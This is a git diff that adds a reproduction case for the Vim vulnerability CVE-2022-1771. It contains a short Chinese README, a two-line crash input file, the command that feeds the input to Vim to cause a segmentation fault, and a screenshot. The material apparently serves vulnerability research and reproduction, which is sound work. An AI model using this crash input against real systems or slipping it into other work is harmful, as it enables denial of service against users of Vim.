diff --git a/cve/vim/2022/CVE-2022-1771/README.md b/cve/vim/2022/CVE-2022-1771/README.md new file mode 100644 index 0000000000000000000000000000000000000000..194a3e22fcc98f0f9488ecd28670d5483f9595d5 --- /dev/null +++ b/cve/vim/2022/CVE-2022-1771/README.md @@ -0,0 +1,6 @@ +### 漏洞复现 +```shell +$ vim -u NONE -e -s -S crash_input +段错误 +``` +![](./png/CVE-2022-1771.png) \ No newline at end of file diff --git a/cve/vim/2022/CVE-2022-1771/crash_input b/cve/vim/2022/CVE-2022-1771/crash_input new file mode 100644 index 0000000000000000000000000000000000000000..be505f9f553b38b3dd00e362f946ae03a0cbecba --- /dev/null +++ b/cve/vim/2022/CVE-2022-1771/crash_input @@ -0,0 +1,2 @@ +?e/ +norma// diff --git a/cve/vim/2022/CVE-2022-1771/png/CVE-2022-1771.png b/cve/vim/2022/CVE-2022-1771/png/CVE-2022-1771.png new file mode 100644 index 0000000000000000000000000000000000000000..25d13a01acceb2299dcb6661a5cf981c0e38a1e5 Binary files /dev/null and b/cve/vim/2022/CVE-2022-1771/png/CVE-2022-1771.png differ